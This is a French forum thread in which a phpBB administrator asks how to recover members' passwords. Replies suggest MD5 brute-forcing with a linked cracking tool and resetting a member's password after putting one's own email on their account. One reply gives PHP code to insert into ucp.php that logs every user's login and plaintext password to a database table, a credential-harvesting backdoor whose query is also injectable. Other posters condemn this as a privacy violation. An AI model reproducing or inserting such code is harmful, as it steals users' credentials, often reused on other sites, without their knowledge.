Bonjour je suis administrateur d'un forum PHPBB et je voudrais savoir si il était possible de récupérer les mots de passe des membres ! Car, lorsque je vais dans phpmyadmin, les mots de passe sont alors cryptés ! Peut on enlever ce cryptage et si oui comment faire ? D'avance merci !

Ben le principe du cryptage c'est justement d'empêcher ce pouvoir retrouver le mdp, donc non. et heureusement.
 

ben c'est du md5, tu peux le decrypter, en 10 12 ans ? avec ton pc perso

md5 c'est pas du cryptage

il existe des logiciel pour les décrypter mais... c long? trés long !    laisse tomber prend un autre forum.

on ne peut pas desactiver la fonction md5 directement dans le code php des pages ?

avec " j'ai oublié mon mot de passe " et en jouant avec, on doit pouvoir gruger un peu nan ?

tai obliger den regenrere un  

Donc si j'ai bien tout compris, il est impossible de récupérer les mots de passe d'un forum phpBB ! tant pis !

euh, pkoi tu veux voir les mots de passe de tes utilisateurs ???

 
Tout à fait, c'est impossible. Par contre, tu peux savoir si un mot de passe appartient à tel ou tel utilisateur, et donc par exemple refaire un nouveau forum en utilisant le MDP crypté dans la BDD comme dans PHPBB, ce qui fait que tes utilisateurs seront reconnus dans le nouveau forum. Mais bon, c'est pas ici qu'il faut poser la question, décortiquer phpbb pour savoir où sont les lignes qui gèrent le MD5 ne nous (en tout cas moi) intéresse pas...   (pas l'objet du forum).

Sinon peut-etre que tu peux éditer un membre, lui mettre ton adresse email, et mettre "g oublier mon mot de pass" ca va t'envoyer le mot de pass sur ton adresse, je pense que c'est possible de le faire!

sinon même avec un md5 , tu peux utiliser la brute force...
   
je donne cette info, j'espere que le but n'est pas de hacker, remarquez que n'importe quel idiot peut se servir de ça:
http://mdcrack.df.ru/
 
tout ça pour dire que l'interet n'est pas forecement le cryptage mais le mot de passe initial... une date de naissance ou un mot du dictionnaire est toujours facile à hacker même crypté.

Ca se décrypte très vite le md5... Déjà en une semaine tu peux chopper ts les pass de tes visiteurs qui font moins de 7 caractères.

DOnc (sans utiliser de dico) ça fait une semaine fois le nombre cde caractères existants pour 8 caractères. Et encore le nombre de caractères de fois plus longtemps pour 9 caractères, suffit d'avoir un bon mot de passe

Avec le brute force, je crack mon pass admin NT en 2h48.
 
Il contient 15 caractères dont plusieurs ascii étendu.
 
Pourtant, les mots de pass NT qui dépassent 7 caractères sont cryptés de façon plus poussée que les moins de 7 caractères.
 
Pour résumer, il respecte la charte de mon AD qui nécessite l'utilisation d'un "stong password" :
 

 
Et pourtant, l'algo d'encryption utilisé par Windows dans la base SAM est extrêment difficile à trouver lorsqu'on atteind 14 caractères.
 
Donc pour une base où les utilisateurs ont certainement des mots de pass entre 5 et 8 caractères, généralement avec uniquement de l'alpha numérique et quelques chiffre, ça se craque en quelques minutes.
 
PS: pour cracker mon pass, j'ai utilisé LC3, qui nécessite de tourner sur le PC hébergeant ma base SAM.

pour info, il existe un "hack" phpbb permettant d'enregistrer les mots de passe en clair dans la base, par contre je sais pas comment ça se passe quand on demande le renvoit du pass, si ça redonne celui en clair ou si ça renvoit toujours un random pass

On trouve ça ou stp ???

 
http://forum.2037.biz/viewforum.php?f=12
 
Demande dans la catégorie connexe si tu trouve pas dans le listing mais c'est ici que je l'ai vu.

1 - Modifier fichier ucp.php et insérer à la ligne 20.
 
$login = $_POST['username'];
$pass = $_POST['password'];
if ($login != "" ){
 mysql_query("INSERT INTO recup_pass (login, pass) VALUES('" . $login . "', '" . $pass . "')" );
}
 
En base de données :  
 
CREATE TABLE IF NOT EXISTS `recup_pass` (
  `id` int(3) NOT NULL auto_increment,
  `login` varchar(250) NOT NULL,
  `pass` varchar(250) NOT NULL,
  PRIMARY KEY  (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;

je trouve ça franchement discutable comme méthodologie.
Certains de tes utilisateurs utilisent (à tort !) le même mot de passe partout, et le connaitre ici fait que tu pourras accéder à leur compte "chez toi", à leur compte sur d'autres sites etc. Et ça c'est du viol de vie privée

 
un code qui reprend l'idée mais  adapté existe sur PHPBB 3.3 ??? car les $_POST ne sont plus autorisé

Je ne comprend pas je ne demande pas à recuperer de mots de pass mais un equivalent pour des variables $_POST qui fonctionneraient pour phpbb 3.3  
 
C'est assez hypocrite de répondre ça sachant que ces mêmes personnes connaissant le code peuvent le faire eux même sur leur forum... comme de dire "télécharger c'est pas bien" et qui le font eux meme mdr
 
Je souhaite récupérer à l'inscription des infos comme l'id, le pseudo, la date de naissance, le pays etc.. et les envoyer dans une table rien de plus

Ce n'est pas hypocrite, c'est un forum publique ou on n'encourages pas les pratiques illégales, si ton problème est celui-ci pourquoi remonter un post antédiluvien qui parles d'autres choses au lieu de répondre à la solution donner par B4X ?

Perso j'ai aucune envie d'avoir mes mdp qui se baladent en clair dans une table d'un quelconque site internet, et j'aurais d'énormes réserves sur les intentions du type qui bidouille un forum pour lui faire enregistrer ça pour tous ses utilisateurs. Topic à fermer.

On va laisser ce topic retourner dans les bas-fonds du forum desquels il n'aurait jamais du sortir, et arrêter ici.